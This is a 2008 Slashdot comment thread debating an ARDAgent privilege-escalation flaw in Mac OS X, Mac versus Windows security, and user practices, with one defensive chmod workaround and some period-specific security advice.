2) The application being launched for the first timw was downloaded from the internet, are you sure
3) than finally when it asks for your password.
And at best it runs as user level without the ARDAagent escalation.

--
Some drink at the fountain of knowledge. Others just gargle.
1. Re:ARDAgent on Tiger by Sancho · 2008-06-25 03:09 · Score: 2, Insightful
  
  Has anyone seen this work on Tiger? If so what's the configuration where it actually works. My wife's notebook runs Tiger, and the exploit worked there. The same set of configurations for which it works on Leopard seem to work on Tiger, too:
  User must be logged into the desktop environment (not just logged in through SSH). You must not have used Fast User Switching to log in. ARDAgent must not be running.
  All computers are vulnerable to trojans. The poker game would run on linux too. Yup. Of course, the main reason that Mac-using Slashdotters point to for why OS X is more secure than Windows is that you aren't running as administrator. Seriously, go look at any OS X/Apple/Mac story, and it always comes up (and frequently) within the comments. Everyone ignores the fact that 99% of what a trojan would want to do can be accomplished without the password, and exploits like this get it that remaining 1%.
2. Re:ARDAgent on Tiger by konohitowa · 2008-06-25 05:21 · Score: 2, Informative
  
  It doesn't work on my Tiger install either having followed all of the same config caveats.
  And at best it runs as user level without the ARDAagent escalation.d
  Not true. Since the admin group has sudo privileges by default in OSX, simply having the password of someone who is allowed to admin the computer gives you the ability to run as root.
  In Linux you have to go out of your way to add users to the /etc/sudoers file.
3. Re:ARDAgent on Tiger by Anonymous Coward · 2008-06-25 08:05 · Score: 0
  
  only retards run as admin on a mac
4. Re:ARDAgent on Tiger by goombah99 · 2008-06-25 08:08 · Score: 1
  
  Has anyone seen this work on Tiger? If so what's the configuration where it actually works. My wife's notebook runs Tiger, and the exploit worked there. The same set of configurations for which it works on Leopard seem to work on Tiger, too:
  User must be logged into the desktop environment (not just logged in through SSH). You must not have used Fast User Switching to log in. ARDAgent must not be running.
  Empirically I can tell you that is not suffcient. Not a single tiger I tested was configured that way and it still would not run. I've never seen it run on any Tiger Machine.
  
  --
  Some drink at the fountain of knowledge. Others just gargle.
5. Re:ARDAgent on Tiger by konohitowa · 2008-06-25 08:17 · Score: 1
  
  I can see why you posted that as an AC. Your ignorance is still safely hidden.
  You might want to learn a little about Unix, groups, and the permissions structure before you post anything as stupid as that using a slashdot account.
6. Re:ARDAgent on Tiger by Anonymous Coward · 2008-06-25 10:35 · Score: 0
  
  I can see why you posted that as an AC. Your ignorance is still safely hidden.
  And I can see why you posted as an Asshat. Your arrogance is in plain sight.
7. Re:ARDAgent on Tiger by konohitowa · 2008-06-25 11:51 · Score: 1
  
  So explain to me what steps you need to take to run as "admin" on a mac.
8. Re:ARDAgent on Tiger by Anonymous Coward · 2008-06-25 13:06 · Score: 0
  
  So explain to me what steps you need to take to run as "admin" on a mac.
  Like Linux, by default the first user created is an admin. The logic for that is obvious.
  Additional users created on mac and on linux are by default not admin users. This means that 1) they do not have sudo priveldges and 2) they do not belong to the wheel or other special group.
  In both linux and mac you can add a user in a way that makes them "admin" users.
  For a non-admin user to act as an admin then from the command line they must first "su" to an admin user and then sudo to execute commands with root privledges. Alternatively on a mac the authentication framework requests the same information but does it through a proxy. This lets the app wanting the privledges to execute a command with root privledges but without learning the password. This is more secure.
  Thus on a mac running as a non-admin user but still enjoying the ability to do admin operations is both greatly simplified and more secure since the password is never revealed
  Of course any application given root permissions, even without knowing the password can do pretty much the same damage. One can imagine however that eventually this framework will be extended to grant applications more limited privledges. e.g. no set UID prviledges or no writing to certain areas, etc.. That however is for the future to decide.
9. Re:ARDAgent on Tiger by konohitowa · 2008-06-26 03:31 · Score: 1
  
  Well, I almost have to think that you're not the original AC that started this. Either that, or you are and had to google the answer. Or maybe chilled out.
  Anyway, the whole point in that question (since I already knew the answer) was to point out that the initial (and therefore default user) on the Mac is an "admin". If you check the thread, you'll see the AC (you?) said "only retards run as admin on a mac".
  That points to an incredible ignorance of the Mac and Unix permissions. And when I called them on that, an AC (same AC?) called me arrogant. After apparently having called anyone with a standard Mac install account a retard.
  See where we're going with this?
Next Steps for Mac Users. by Anonymous Coward · 2008-06-25 01:54 · Score: 0

Although some poeple are STILL in denial about Mac OS security, by now almost all Mac users know that their computers are vulnerable to trojans and malware. After all, within the past year there have been over 60 Slashdot articles on the subject and dozens of very high profile stories in the popular press.
The scary part is that most Mac OS users think they can't catch malware because they're smart enough not to install it. Nothing could be further from the truth.
History shows us that even the smartest of users can catch malware. Your best form of protection is the same protection afforded to users of Windows: Symantec's Norton Security products are mature, with Mac versions being available on the Mac platform for literally decades. As a low-cost subscription, every Mac user can walk away with the security and piece of mind offered by Norton.
1. Re:Next Steps for Mac Users. by pandrijeczko · 2008-06-25 03:19 · Score: 1
  
  You sound like you work for Norton so can I state here and now that I stopped using both Symantec's and Mcafee's products several years ago because they are both bloated pieces of adware that only care about signing you up to a subscription. They are bloated, resource hungry and overly intrusive.
  I now use a range of both free and commercial products that are cheaper, better and just run pretty silently in the background without bothering me every five minutes. I am an experienced computer user but I have fixed at least a dozen friend's a realtives PCs over the years that came pre-installed with Symantec software that was bugging the hell out of them for more subscription money. Having removed it completely and replaced it with legitimate versions of the products I use, each and every one of them has said their PCs run faster and they are no longer constantly interrupted with update messages.
  Both Symantec & Mcafee products serve a purpose for a price - but half the stuff in the "Internet Security Suite" packages are redundant and the other half can be bought cheaper elsewhere without the nagging.
  
  --
  Gentoo Linux - another day, another USE flag.
Fresh out of the apple tree by electricbern · 2008-06-25 01:57 · Score: 1

Worms for Apples. Can't you just smell the pun?

--
alias possession='chmod 666 satan && ls /dev > il && tail daemon.log'
1. Re:Fresh out of the apple tree by hyades1 · 2008-06-25 03:32 · Score: 1
  
  "Smell the pun"??? What an apt expression.
  
  --
  I've calculated my velocity with such exquisite precision that I have no idea where I am.
What are Mac users doing wrong exactly? by PPCAvenger · 2008-06-25 03:35 · Score: 1

People keep accusing Mac users (I use a Mac laptop and an XP tower myself) of being lax on security but what exactly does this mean and what exactly are "we" doing wrong?
I don't run anti-virus on my Mac but I do run it on my PC. In all the years of running it on the PC I've never once had it detect anything and the only thing the malware scanners have ever flagged are cookies and Win MRU files; even when I slacked off and didn't scan for six months or more. Prior to that I used Windows 95/98 for many years without an AV program at all; never had an issue.
Security (for a home desktop) is not a difficult thing to maintain. I've basically lived by the rules I learned from watching Leo Laporte on "The Net" on C/Net TV back when I dialed up to the Internet using my 14.4 fax/modem and and Netscape Navigator 2.0 and RealPlayer were a big deal... Don't open attachments you weren't expecting, don't download files from sites you don't trust, keep your software up-to-date, use a firewall (though that one came a bit later).
That's pretty much all there is too it folks, not that I have to tell this crowd. If people are opening attachments and downloading executables from anywhere and everywhere then that has nothing to do with platform security or feeling that you are invulnerable it's just bad practice and those people need to be introduced to the very simple rules and slapped when the fail to follow them.
On the issue of Mac passwords, I'm very suspicious when any program asks me for a password to do installations because most user land apps on a Mac shouldn't need an installer at all let alone one that needs escalated privs to install or operate. A keychain prompt is not the common occurrence that the Vista equivalent is said to be. (I haven't had much hands on time with Vista.)
The big companies are guilty of prompting for passwords often with installers but I trust they won't infect my computer with malware (depending on your views on DRM...) and let them go ahead.
To summarize this lengthy post, how are Mac users acting less cautiously than anyone else? There's not a whole lot more they could be doing aside from running mostly worthless AV programs.
Tell me your pet's name... by xactuary · 2008-06-25 03:49 · Score: 1

Guessing passwords isn't that difficult. Tell me your pet's name and I'll tell you your password.

--
Say hello to my little sig.
1. Re:Tell me your pet's name... by Anonymous Coward · 2008-06-25 07:09 · Score: 0
  
  My pet's name is 'Mouse'. Please respond with my password.
Wait a minute... by rgviza · 2008-06-25 04:02 · Score: 0, Flamebait

OSX and linux are immune to viruses and don't get malware!!!
>plant tongue firmly in cheek /end sarcasm
I hate to say it but I told you so. I cringe every time I see some moron recommending linux or OSX "because they don't get viruses and are immune to malware".
And no, I'm not a windows user (except at work, Gentoo at home).
The reason for the "immunity" is that people simply haven't targeted these os's yet. 0day will get here eventually... just give it time.
-Viz

--
Don't kid yourself. It's the size of the regexp AND how you use it that counts.
How Many Articles Out Of ONE Exploit? by macs4all · 2008-06-25 04:18 · Score: 0

There has been one exploit of the setuid permission in ARDAgent (and its minion, osascript), but THREE /. articles (including this one) that try and make it sound like there's a new exploit every single day in OS X.

Oh, and of course, neither TFA nor the /. summary points out that the vulnerability is easy rendered ineffective by disabling the setuid bit (sticky bit) in ARDAAgent, by typing the following into a Terminal session:

sudo chmod 550 /System/Library/CoreServices/RemoteManagement/ARDAgent.app

That will do until Apple addresses this vulnerability, and will NOT affect normal operation of Apple Remote Desktop. Caution: Do not "Repair Permissions" until Apple fixes this "officially", or at least do the "chmod" thing, above, immediately AFTER you Repair Permissions.

That is all.
It's not "immunity", it's "resistance". by argent · 2008-06-25 04:49 · Score: 2, Insightful

I'm so damn sick of people going "oooh, aaah, I thought $software was immune to $threat" when no credible commentator has made such a claim.
Just quit it, OK? It just makes you look like an utter twit.
And it's not just a lack of being targeted. It's a smaller surface area for attack, as well. OS X has nothing comparable to the rich viral petrie dish that the tight desktop-browser integration in Windows provides. Before 1997, Windows viruses were virtually all a matter of tricking people into running software, not having software automatically run when you just select an email message so you can delete it... which is how bad things were in the late '90s. Microsoft has tightened up the gaping holes in Windows since then, but they have done NOTHING to remove the underlying flaw that makes these kinds of attacks so easy there.
Compared to Windows, OS X is "virus resistant". That doesn't mean "virus proof". But it does mean that it's going to remain harder to infect than Windows until such time as Apple decides to implement something as barking mad as ActiveX.
Still nothing to see here. by argent · 2008-06-25 04:53 · Score: 2, Insightful

These trojans are purely payload. The delivery mechanism is still social engineering... not remote execution. We know that "once you're penetrated you're ****ed", pointing out again the ways you can be ****ed is not news (for nerds or otherwise) nor stuff that matters.
These are not the viruses you're looking for. Nothing to see here, move along.
The real "Next Step for Mac (& Windows) Users" by argent · 2008-06-25 05:11 · Score: 4, Informative

History shows us that even the smartest of users can catch malware.
It's been 17 years since the last time I had to remove a virus from my own computer, even when that computer's been unpatched Windows 2000 connected to the Internet. In the years that I was network and security admin and had control of the network, the only time we had any systems infected was when a user had either downloaded and run a file (that is, they were social-engineered, and in 10 years only one person came to me with an infected laptop after doing that twice) or they had violated my policy banning IE and Outlook at our location.
The potential for infection if you avoid software that supports automatic execution of remote content is very very small, even on Windows. The reason that Windows has a high infection rate is because of IE and Outlook, not simply because it's popular.
If you're on a Mac, and use Safari, here's the next steps you should take:
(1) Go into preferences and make sure "Open 'Safe' Files after Downloading" is disabled.
(2) Get a standalone FTP client and use one of the third-party LaunchServices editors (look for internet access preference panes) and change the default application for FTP: URLs from Finder to something else.
(3) Use Tinkertool or equivalent to disable Dashboard.
#1 is the most important. #2 and #3 don't allow automatic execution of untrusted content, but they do make social engineer ing easier.
If you use a Gecko-based browser like Firefox or Camino, you don't need to worry about these.
If you're on Windows: avoid using any application that uses the Microsoft HTML control to access untrusted content. That includes IE, Outlook (not all versions, any more, but I believe you have to accept the Vista-style UI to avoid it), Windows Media Player, Realplayer, and some Firefox plugins and some versions of Netscape.
In Firefox, Windows or Mac or Linux, always clean out the whitelist for installing extensions after you install an extension... the installer is an autoexecution mechanism, and there have been exploits that took advantage of that even if you don't approve the install dialog.
The scary part is that most Mac OS users think they can't catch malware because they're smart enough not to install it.
At the moment that's not far from the truth. You can avoid catching malware by being smart enough to avoid running it, on Windows or OS X, if you exercise some care in the applications you use, and how they're configured. It's harder on Windows, but it's still possible.
Here is the Workaround patch by Anonymous Coward · 2008-06-25 05:17 · Score: 2, Informative

http://www.macfixit.com/article.php?story=20080624105604884
Hold on there... by ToasterMonkey · 2008-06-25 05:18 · Score: 1

Do you have any idea what the impact of ILOVEYOU and Code Red were on corporate Windows systems? Let me assure you, these systems had administrators. All jokes about Windows administrators aside, they're actually more competent than many of you kids think.
What about SQL Slammer? That was anything but insignificant, and I'm pretty darned sure most SQL servers do in fact have administrators taking care of them. Don't think for a damned second that the average Oracle admin knows a damn thing more about system security than a SQL admin would.
All I'm trying to say, is a good Linux worm would be the freaking cat's pajamas, and I believe there are more public, Internet facing corporate Linux servers than Windows at the moment, and these are run largely by people who regard rsync as an enterprise backup solution. These are the same people that would rather build and maintain their own iSCSI server than ask the company to plunk down for another FC HBA or two.
So, please don't just assume every "Linux admin" will have the most secured, locked down configuration in the world, unless they're only managing something like five servers. That really goes for sysadmins of any system, don't assume a Solaris, Window, Mac, Linux, whatever admin to go over the entire enterprise environment with a fine toothed comb, writing personalized firewall rules for each box.
Erm... sorry, I must be a little jaded by the goings on at work, and I've lost touch with the Linux world ever since I read a large article on storage in Linux Magazine that filed two pages with iSCSI and Infiniband of all things, with no mention of Fibre Channel. Linux admins are from a different f'ing planet or something.
microsoft by mapleneckblues · 2008-06-25 05:32 · Score: 0, Flamebait

Waiting for the fanbois to start blaming microsoft.
2 Exploits? Thats all? by Em0ry42 · 2008-06-25 08:12 · Score: 2, Insightful

I'm sorry... but am I alone in thinking that its HILarious that everyone gets whipped into a frenzy when _2_ POSSIBLE exploits are discovered in Mac OS, when Windows has over the years shown... thousands if not millions?
I don't mean to be an anti-windows troll, trust me, I still have 2 Windows machines at home (and then 10 Ubuntu) but assuming that whoever discovered these vulnerabilities spends a large portion of their time looking for them, I'd say the record looks pretty good thus far...
I personally have concluded that its not possible to make a COMPLETELY secure OS, (especially given PEBKAC) but if you make one that demonstrates issues on a rare/reasonably rare basis then you've done it well.
So Hurrah Apple (and contributing OSS Devs), I say job well done!!!

--
Sig: Do not judge me on how high UID is, but judge me on the content of my comments.
1. Re:2 Exploits? Thats all? by Anonymous Coward · 2008-06-25 11:42 · Score: 0
  
  I'm sorry... but am I alone in thinking that its HILarious that everyone gets whipped into a frenzy when _2_ POSSIBLE exploits are discovered in Mac OS, when Windows has over the years shown... thousands if not millions? I would find it hilarious except it hasn't been 2 vulnerabilities, there have been hundreds for apple just in the last year or so, these 2 are just examples of how easy it will be for trojans to take advantage of users with the "latest" vulnerabilities. Feel free to do a google for yourself if you are foolish enough to think there have ONLY been 2 vulnerabilities.
Poll on sodahead by threnodyeve · 2008-06-25 12:40 · Score: 1

Sucks for Mac Users! I saw a poll about this on Sodahead.. http://www.sodahead.com/question/106949/
yes yes yes, the mac is so insecure that . . . . by kraksmoka · 2008-06-28 07:01 · Score: 1

there's a whole industry of companies that sprung up just to plug the leaks. any free software on the mac is just commercial crud that's reporting your passwords, preferences, deepest darkest secrets, etc. to a secret dark corporate master who is selling the data, or advertising to you to make money, stealing your bandwidth, processing time, etc.
oh wait, that's winbloze . . . .
it is great that there is the scrutiny, but when most of the bugs are social engineering, or physical access hacks, it just confirms what the whole world knows:
Macs are more secure!
Oh, and for all of you people with blank passwords, please fill them in . . . . at least use the combination to your luggage. is 123456 that tough to remember or type????

--
"You never want a serious crisis to go to waste." - Rahm Emanuel